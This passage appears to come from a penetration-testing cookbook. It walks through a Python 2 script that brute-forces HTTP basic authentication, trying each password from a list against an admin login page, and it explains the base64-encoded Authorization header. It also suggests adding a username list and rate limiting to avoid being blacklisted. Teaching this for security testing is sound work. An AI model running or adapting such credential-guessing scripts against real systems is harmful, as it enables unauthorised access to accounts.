Many websites use HTTP basic authentication to restrict access to content. This is especially prevalent in embedded devices such as routers. The Python requests library has built-in support for basic authentication, making an easy way to create an authentication brute force script.
Before creating this recipe, you're going to need a list of passwords to attempt to authenticate with. Create a local text file called passwords.txt, with each password on a new line. Check out Brute forcing passwords in Chapter 2, Enumeration, for password lists from online resources. Also, spend some time to scope out the target server as you're going to need to know how it responds to a failed login request, so that we can differentiate when the brute force works or not.
The following code will attempt to brute force entry to website through basic authentication:
import requests
from requests.auth import HTTPBasicAuth
with open('passwords.txt') as passwords:
for password in passwords.readlines():
password = password.strip()
req = requests.get('http://packtpub.com/admin_login.html', auth=HTTPBasicAuth('admin', password))
if req.status_code == 401:
print password, 'failed.'
elif req.status_code == 200:
print 'Login successful, password:', password
break
else:
print 'Error occurred with', password
breakThe first part of this script reads in the password list, line by line. Then, it sends an HTTP GET request to the login page:
req = requests.get('http://packtpub.com/admin_login.html', auth=HTTPBasicAuth('admin', password))This request has an additional auth parameter, which contains the username admin and the password read from the passwords.txt file. When sending an HTTP request with a basic Authorization header, the raw data looks like the following:
Notice that in the Authorization header the data is sent in an encoded format, such as YWRtaW46cGFzc3dvcmQx. This is the username and password in a base64 encoded form of username:password; the requests.auth.HTTPBasicAuth class just does this conversion for us. This can be verified by using the base64 library, as shown in the following screenshot:
Knowing this information means that you could still get the script to run without the external requests library; instead, it crafts an Authorization header manually using the base64 default library.
The following is a screenshot of the brute force script in action:
In this example, we've used a fixed username of admin in the authorization request, as this was known. If this is unknown, you could create a username.txt text file and loop through each of those lines too, just as we've done with the password text file. Note that this is a much slower process and creates a lot of HTTP requests to the target site, which is likely to get you blacklisted, unless you implement rate limiting.
Check out the Checking username validity and Brute forcing usernames recipes in Chapter 2, Enumeration, for further ideas on username and password combinations.